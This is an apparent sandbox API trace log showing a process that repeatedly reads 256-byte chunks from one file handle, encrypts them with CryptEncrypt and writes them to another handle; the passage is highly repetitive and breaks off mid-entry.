WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.666] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.666] GetLastError () returned 0x0 [0144.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.666] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.667] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.667] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.667] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.667] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.668] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.668] GetLastError () returned 0x0 [0144.668] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.668] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.669] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.669] GetLastError () returned 0x0 [0144.669] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.669] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.670] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.670] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.670] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.671] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.671] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.671] GetLastError () returned 0x0 [0144.671] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 